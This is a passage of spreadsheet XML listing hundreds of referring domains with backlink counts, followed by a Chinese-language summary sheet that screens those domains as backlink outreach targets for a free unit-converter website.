      </x:c>
      <x:c r="C474" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="475">
      <x:c r="A475" s="86" t="str">
        <x:v>https://tvgist.com</x:v>
      </x:c>
      <x:c r="B475" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C475" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="476">
      <x:c r="A476" s="86" t="str">
        <x:v>https://foxandhazel.com</x:v>
      </x:c>
      <x:c r="B476" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C476" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="477">
      <x:c r="A477" s="86" t="str">
        <x:v>https://vanpolengroup.com</x:v>
      </x:c>
      <x:c r="B477" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C477" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="478">
      <x:c r="A478" s="86" t="str">
        <x:v>https://slayathomemother.com</x:v>
      </x:c>
      <x:c r="B478" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C478" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="479">
      <x:c r="A479" s="86" t="str">
        <x:v>https://makingfrugalfun.com</x:v>
      </x:c>
      <x:c r="B479" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C479" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="480">
      <x:c r="A480" s="86" t="str">
        <x:v>https://coaching-online.org</x:v>
      </x:c>
      <x:c r="B480" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C480" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="481">
      <x:c r="A481" s="86" t="str">
        <x:v>https://mixmirth.com</x:v>
      </x:c>
      <x:c r="B481" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C481" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="482">
      <x:c r="A482" s="86" t="str">
        <x:v>https://air-o-tech.co.za</x:v>
      </x:c>
      <x:c r="B482" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C482" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="483">
      <x:c r="A483" s="86" t="str">
        <x:v>https://itsallyouboo.com</x:v>
      </x:c>
      <x:c r="B483" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C483" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="484">
      <x:c r="A484" s="86" t="str">
        <x:v>https://artera.io</x:v>
      </x:c>
      <x:c r="B484" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C484" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="485">
      <x:c r="A485" s="86" t="str">
        <x:v>https://mara.biz</x:v>
      </x:c>
      <x:c r="B485" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C485" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="486">
      <x:c r="A486" s="86" t="str">
        <x:v>https://sixthbloom.com</x:v>
      </x:c>
      <x:c r="B486" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C486" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="487">
      <x:c r="A487" s="86" t="str">
        <x:v>https://canva.site</x:v>
      </x:c>
      <x:c r="B487" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C487" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="488">
      <x:c r="A488" s="86" t="str">
        <x:v>https://plannerjam.com</x:v>
      </x:c>
      <x:c r="B488" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C488" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="489">
      <x:c r="A489" s="86" t="str">
        <x:v>https://msmomfixit.com</x:v>
      </x:c>
      <x:c r="B489" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C489" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="490">
      <x:c r="A490" s="86" t="str">
        <x:v>https://lecf.ca</x:v>
      </x:c>
      <x:c r="B490" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C490" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="491">
      <x:c r="A491" s="86" t="str">
        <x:v>https://sacredheartstmichael.com</x:v>
      </x:c>
      <x:c r="B491" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C491" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="492">
      <x:c r="A492" s="86" t="str">
        <x:v>https://travelaway.cl</x:v>
      </x:c>
      <x:c r="B492" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C492" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="493">
      <x:c r="A493" s="86" t="str">
        <x:v>https://justbeetit.com</x:v>
      </x:c>
      <x:c r="B493" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C493" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="494">
      <x:c r="A494" s="86" t="str">
        <x:v>https://martinek.sk</x:v>
      </x:c>
      <x:c r="B494" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C494" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="495">
      <x:c r="A495" s="86" t="str">
        <x:v>https://readysetsensory.com</x:v>
      </x:c>
      <x:c r="B495" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C495" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="496">
      <x:c r="A496" s="86" t="str">
        <x:v>https://can-ammax2.com</x:v>
      </x:c>
      <x:c r="B496" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C496" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="497">
      <x:c r="A497" s="86" t="str">
        <x:v>https://acountrygirlslife.com</x:v>
      </x:c>
      <x:c r="B497" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C497" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="498">
      <x:c r="A498" s="86" t="str">
        <x:v>https://sowgrowharvest.co.uk</x:v>
      </x:c>
      <x:c r="B498" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C498" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="499">
      <x:c r="A499" s="86" t="str">
        <x:v>https://donusumpsikoterapi.com</x:v>
      </x:c>
      <x:c r="B499" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C499" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="500">
      <x:c r="A500" s="86" t="str">
        <x:v>https://beingecomomical.com</x:v>
      </x:c>
      <x:c r="B500" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C500" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="501">
      <x:c r="A501" s="86" t="str">
        <x:v>https://courtneybslp.com</x:v>
      </x:c>
      <x:c r="B501" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C501" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="502">
      <x:c r="A502" s="86" t="str">
        <x:v>https://ccicthai.com</x:v>
      </x:c>
      <x:c r="B502" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C502" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="503">
      <x:c r="A503" s="86" t="str">
        <x:v>https://wordexceler.ru</x:v>
      </x:c>
      <x:c r="B503" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C503" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="504">
      <x:c r="A504" s="86" t="str">
        <x:v>https://thriveathomecentral.com</x:v>
      </x:c>
      <x:c r="B504" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C504" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="505">
      <x:c r="A505" s="86" t="str">
        <x:v>https://fivespotgreenliving.com</x:v>
      </x:c>
      <x:c r="B505" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C505" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="506">
      <x:c r="A506" s="86" t="str">
        <x:v>https://thecortezkitchen.com</x:v>
      </x:c>
      <x:c r="B506" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C506" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="507">
      <x:c r="A507" s="86" t="str">
        <x:v>https://havetwinsfirst.com</x:v>
      </x:c>
      <x:c r="B507" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C507" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="508">
      <x:c r="A508" s="86" t="str">
        <x:v>https://oldworldnew.us</x:v>
      </x:c>
      <x:c r="B508" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C508" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="509">
      <x:c r="A509" s="86" t="str">
        <x:v>https://muyora.com</x:v>
      </x:c>
      <x:c r="B509" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C509" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="510">
      <x:c r="A510" s="86" t="str">
        <x:v>https://monetizationmethod.com</x:v>
      </x:c>
      <x:c r="B510" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C510" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="511">
      <x:c r="A511" s="86" t="str">
        <x:v>https://recipe4peace.com</x:v>
      </x:c>
      <x:c r="B511" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C511" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="512">
      <x:c r="A512" s="86" t="str">
        <x:v>https://xoxoshelly.com</x:v>
      </x:c>
      <x:c r="B512" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C512" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="513">
      <x:c r="A513" s="86" t="str">
        <x:v>https://amandaseghetti.com</x:v>
      </x:c>
      <x:c r="B513" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C513" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="514">
      <x:c r="A514" s="86" t="str">
        <x:v>https://karenscastleblog.com</x:v>
      </x:c>
      <x:c r="B514" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C514" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="515">
      <x:c r="A515" s="86" t="str">
        <x:v>https://ifitbringsyoujoy.com</x:v>
      </x:c>
      <x:c r="B515" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C515" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="516">
      <x:c r="A516" s="86" t="str">
        <x:v>https://thenomadplate.com</x:v>
      </x:c>
      <x:c r="B516" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C516" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="517">
      <x:c r="A517" s="86" t="str">
        <x:v>https://myruler.co.uk</x:v>
      </x:c>
      <x:c r="B517" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C517" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="518">
      <x:c r="A518" s="86" t="str">
        <x:v>https://terabox.com</x:v>
      </x:c>
      <x:c r="B518" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C518" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="519">
      <x:c r="A519" s="86" t="str">
        <x:v>https://adgreencoat.eu</x:v>
      </x:c>
      <x:c r="B519" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C519" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="520">
      <x:c r="A520" s="86" t="str">
        <x:v>https://lifetimewebdesigns.com</x:v>
      </x:c>
      <x:c r="B520" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C520" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="521">
      <x:c r="A521" s="86" t="str">
        <x:v>https://ddecoraty.com</x:v>
      </x:c>
      <x:c r="B521" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C521" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="522">
      <x:c r="A522" s="86" t="str">
        <x:v>https://backyardsummercamp.com</x:v>
      </x:c>
      <x:c r="B522" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C522" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="523">
      <x:c r="A523" s="86" t="str">
        <x:v>https://evimveailem.com</x:v>
      </x:c>
      <x:c r="B523" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C523" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="524">
      <x:c r="A524" s="86" t="str">
        <x:v>https://gwynsfoxynest.com</x:v>
      </x:c>
      <x:c r="B524" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C524" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="525">
      <x:c r="A525" s="86" t="str">
        <x:v>https://compuhardware.com.mx</x:v>
      </x:c>
      <x:c r="B525" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C525" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="526">
      <x:c r="A526" s="86" t="str">
        <x:v>https://gypsyplate.com</x:v>
      </x:c>
      <x:c r="B526" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C526" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="527">
      <x:c r="A527" s="86" t="str">
        <x:v>https://losbragas.com.br</x:v>
      </x:c>
      <x:c r="B527" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C527" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="528">
      <x:c r="A528" s="86" t="str">
        <x:v>https://bleutria.com</x:v>
      </x:c>
      <x:c r="B528" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C528" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="529">
      <x:c r="A529" s="86" t="str">
        <x:v>https://cacoastfoa.com</x:v>
      </x:c>
      <x:c r="B529" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C529" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="530">
      <x:c r="A530" s="86" t="str">
        <x:v>https://healthywealthyvida.com</x:v>
      </x:c>
      <x:c r="B530" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C530" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="531">
      <x:c r="A531" s="86" t="str">
        <x:v>https://artsycraftsymom.com</x:v>
      </x:c>
      <x:c r="B531" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C531" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="532">
      <x:c r="A532" s="86" t="str">
        <x:v>https://activity-mom.com</x:v>
      </x:c>
      <x:c r="B532" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C532" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="533">
      <x:c r="A533" s="86" t="str">
        <x:v>https://tfhsm.com</x:v>
      </x:c>
      <x:c r="B533" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C533" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="534">
      <x:c r="A534" s="86" t="str">
        <x:v>https://dulceny.com</x:v>
      </x:c>
      <x:c r="B534" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C534" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="535">
      <x:c r="A535" s="86" t="str">
        <x:v>https://mairiedepreuxausart.fr</x:v>
      </x:c>
      <x:c r="B535" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C535" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="536">
      <x:c r="A536" s="86" t="str">
        <x:v>https://gatheringbeauty.com</x:v>
      </x:c>
      <x:c r="B536" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C536" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="537">
      <x:c r="A537" s="86" t="str">
        <x:v>https://mummyvswork.co.uk</x:v>
      </x:c>
      <x:c r="B537" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C537" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="538">
      <x:c r="A538" s="86" t="str">
        <x:v>https://motivationformom.com</x:v>
      </x:c>
      <x:c r="B538" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C538" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="539">
      <x:c r="A539" s="86" t="str">
        <x:v>https://thestressfreechristmas.com</x:v>
      </x:c>
      <x:c r="B539" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C539" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="540">
      <x:c r="A540" s="86" t="str">
        <x:v>https://plancreatives.com</x:v>
      </x:c>
      <x:c r="B540" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C540" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="541">
      <x:c r="A541" s="86" t="str">
        <x:v>https://cannibalnyc.com</x:v>
      </x:c>
      <x:c r="B541" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C541" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="542">
      <x:c r="A542" s="86" t="str">
        <x:v>https://cleverlittlepumpkins.com</x:v>
      </x:c>
      <x:c r="B542" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C542" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="543">
      <x:c r="A543" s="86" t="str">
        <x:v>https://thewildwest3.com</x:v>
      </x:c>
      <x:c r="B543" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C543" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="544">
      <x:c r="A544" s="86" t="str">
        <x:v>https://huihangda.com</x:v>
      </x:c>
      <x:c r="B544" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C544" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="545">
      <x:c r="A545" s="86" t="str">
        <x:v>https://amyboyington.com</x:v>
      </x:c>
      <x:c r="B545" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C545" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="546">
      <x:c r="A546" s="86" t="str">
        <x:v>https://empoweredmontessorimama.com</x:v>
      </x:c>
      <x:c r="B546" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C546" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="547">
      <x:c r="A547" s="86" t="str">
        <x:v>https://freebiebag.co.uk</x:v>
      </x:c>
      <x:c r="B547" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C547" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="548">
      <x:c r="A548" s="86" t="str">
        <x:v>https://remedies-and-recipes.com</x:v>
      </x:c>
      <x:c r="B548" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C548" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="549">
      <x:c r="A549" s="86" t="str">
        <x:v>https://aliwinstonphotography.com</x:v>
      </x:c>
      <x:c r="B549" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C549" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="550">
      <x:c r="A550" s="86" t="str">
        <x:v>https://homeschoolandhappiness.com</x:v>
      </x:c>
      <x:c r="B550" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C550" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="551">
      <x:c r="A551" s="86" t="str">
        <x:v>https://theodysseyonline.com</x:v>
      </x:c>
      <x:c r="B551" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C551" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="552">
      <x:c r="A552" s="86" t="str">
        <x:v>https://listennotes.com</x:v>
      </x:c>
      <x:c r="B552" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C552" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="553">
      <x:c r="A553" s="86" t="str">
        <x:v>https://littlesproutslearning.co</x:v>
      </x:c>
      <x:c r="B553" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C553" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="554">
      <x:c r="A554" s="86" t="str">
        <x:v>https://redrosespeechies.com</x:v>
      </x:c>
      <x:c r="B554" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C554" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
  </x:sheetData>
  <x:pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <x:tableParts count="1">
    <x:tablePart xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="R969d05705d15401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43" hidden="0" customWidth="1"/>
    <x:col min="3" max="3" width="14" hidden="0" customWidth="1"/>
    <x:col min="4" max="4" width="18" hidden="0" customWidth="1"/>
    <x:col min="5" max="5" width="14" hidden="0" customWidth="1"/>
    <x:col min="6" max="6" width="3" hidden="0" customWidth="1"/>
    <x:col min="7" max="7" width="28" hidden="0" customWidth="1"/>
    <x:col min="8" max="8" width="11" hidden="0" customWidth="1"/>
    <x:col min="9" max="9" width="15" hidden="0" customWidth="1"/>
    <x:col min="10" max="10" width="50" hidden="0" customWidth="1"/>
    <x:col min="11" max="11" width="46" hidden="0" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" ht="30" customHeight="1">
      <x:c r="A1" s="32" t="str">
        <x:v>Referring Domains 逐条筛选记录</x:v>
      </x:c>
      <x:c r="B1" s="32"/>
      <x:c r="C1" s="32"/>
      <x:c r="D1" s="32"/>
      <x:c r="E1" s="32"/>
      <x:c r="F1" s="32"/>
      <x:c r="G1" s="32"/>
      <x:c r="H1" s="32"/>
    </x:row>
    <x:row r="2">
      <x:c r="A2" s="38" t="str">
        <x:v>分析产品</x:v>
      </x:c>
      <x:c r="B2" s="39" t="str">
        <x:v>Unit Converter for Science</x:v>
      </x:c>
      <x:c r="C2" s="40" t="str">
        <x:v>产品 URL</x:v>
      </x:c>
      <x:c r="D2" s="39" t="str">
        <x:v>https://www.unitconv.top</x:v>
      </x:c>
      <x:c r="E2" s="40" t="str">
        <x:v>定价</x:v>
      </x:c>
      <x:c r="F2" s="39" t="str">
        <x:v>free</x:v>
      </x:c>
      <x:c r="G2" s="40" t="str">
        <x:v>核验日期</x:v>
      </x:c>
      <x:c r="H2" s="41" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
    </x:row>
    <x:row r="3" ht="42" customHeight="1">
      <x:c r="A3" s="42" t="str">
        <x:v>源文件</x:v>
      </x:c>
      <x:c r="B3" s="21" t="str">
        <x:v>C:/Users/Shijm/Desktop/www.blackwhitecards.top_ReferringDomainsSimilarSite_9_2_2026.csv</x:v>
      </x:c>
      <x:c r="C3" s="35" t="str">
        <x:v>源行数</x:v>
      </x:c>
      <x:c r="D3" s="21" t="n">
        <x:v>553</x:v>
      </x:c>
      <x:c r="E3" s="35" t="str">
        <x:v>A 列</x:v>
      </x:c>
      <x:c r="F3" s="21" t="str">
        <x:v>https://www.littlelifelonglearners.com/ BacklinksCount</x:v>
      </x:c>
      <x:c r="G3" s="35" t="str">
        <x:v>B 列</x:v>
      </x:c>
      <x:c r="H3" s="43" t="str">
        <x:v>https://natashalh.com/ BacklinksCount</x:v>
      </x:c>
    </x:row>
    <x:row r="4" ht="42" customHeight="1">
      <x:c r="A4" s="42" t="str">
        <x:v>核验范围</x:v>
      </x:c>
      <x:c r="B4" s="21" t="str">
        <x:v>逐个访问 CSV 中的域名根 URL；记录首页访问、标题/摘要和规则化筛选。投稿入口只对重点候选及明确排除项做了深度核验。</x:v>
      </x:c>
      <x:c r="C4" s="35" t="str"/>
      <x:c r="D4" s="21" t="str"/>
      <x:c r="E4" s="35" t="str"/>
      <x:c r="F4" s="21" t="str"/>
      <x:c r="G4" s="35" t="str"/>
      <x:c r="H4" s="43" t="str"/>
    </x:row>
    <x:row r="5">
      <x:c r="A5" s="44" t="str">
        <x:v>重要限制</x:v>
      </x:c>
      <x:c r="B5" s="45" t="str">
        <x:v>文件名与 CSV 表头不一致；A/B 是两个参照站的 backlink 数，不是当前产品的质量评分。不能将高数值直接等同于可做外链。</x:v>
      </x:c>
      <x:c r="C5" s="46" t="str"/>
      <x:c r="D5" s="45" t="str"/>
      <x:c r="E5" s="46" t="str"/>
      <x:c r="F5" s="45" t="str"/>
      <x:c r="G5" s="46" t="str"/>
      <x:c r="H5" s="47" t="str"/>
    </x:row>
    <x:row r="7">
      <x:c r="A7" s="62" t="str">
        <x:v>筛选结论</x:v>
      </x:c>
      <x:c r="B7" s="62" t="str">
        <x:v>数量</x:v>
      </x:c>
      <x:c r="D7" s="62" t="str">
        <x:v>核心指标</x:v>
      </x:c>
      <x:c r="E7" s="62" t="str">
        <x:v>数量</x:v>
      </x:c>
      <x:c r="G7" s="66" t="str">
        <x:v>首批候选（按当前 Unit Converter 产品）</x:v>
      </x:c>
      <x:c r="H7" s="66"/>
      <x:c r="I7" s="66"/>
      <x:c r="J7" s="66"/>
      <x:c r="K7" s="66"/>
    </x:row>
    <x:row r="8">
      <x:c r="A8" s="58" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="B8" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$N$2:$N$554,A8)</x:f>
        <x:v>4</x:v>
      </x:c>
      <x:c r="D8" s="58" t="str">
        <x:v>域名总数</x:v>
      </x:c>
      <x:c r="E8" s="58" t="n">
        <x:f>COUNTA('逐条筛选'!$A$2:$A$554)</x:f>
        <x:v>553</x:v>
      </x:c>
      <x:c r="G8" s="72" t="str">
        <x:v>域名</x:v>
      </x:c>
      <x:c r="H8" s="72" t="str">
        <x:v>A/B</x:v>
      </x:c>
      <x:c r="I8" s="72" t="str">
        <x:v>结论</x:v>
      </x:c>
      <x:c r="J8" s="72" t="str">
        <x:v>建议动作</x:v>
      </x:c>
      <x:c r="K8" s="72" t="str">
        <x:v>证据 URL</x:v>
      </x:c>
    </x:row>
    <x:row r="9">
      <x:c r="A9" s="58" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="B9" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$N$2:$N$554,A9)</x:f>
        <x:v>273</x:v>
      </x:c>
      <x:c r="D9" s="58" t="str">
        <x:v>首页可访问</x:v>
      </x:c>
      <x:c r="E9" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$G$2:$G$554,"可访问")</x:f>
        <x:v>429</x:v>
      </x:c>
      <x:c r="G9" s="73" t="str">
        <x:v>educationcorner.com</x:v>
      </x:c>
      <x:c r="H9" s="73" t="str">
        <x:v>1/0</x:v>
      </x:c>
      <x:c r="I9" s="73" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="J9" s="73" t="str">
        <x:v>建议链接到 /en/about 或具体换算页面，不要只发首页。</x:v>
      </x:c>
      <x:c r="K9" s="73" t="str">
        <x:v>https://www.educationcorner.com/about/</x:v>
      </x:c>
    </x:row>
    <x:row r="10">
      <x:c r="A10" s="58" t="str">
        <x:v>付费/不优先</x:v>
      </x:c>
      <x:c r="B10" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$N$2:$N$554,A10)</x:f>
        <x:v>5</x:v>
      </x:c>
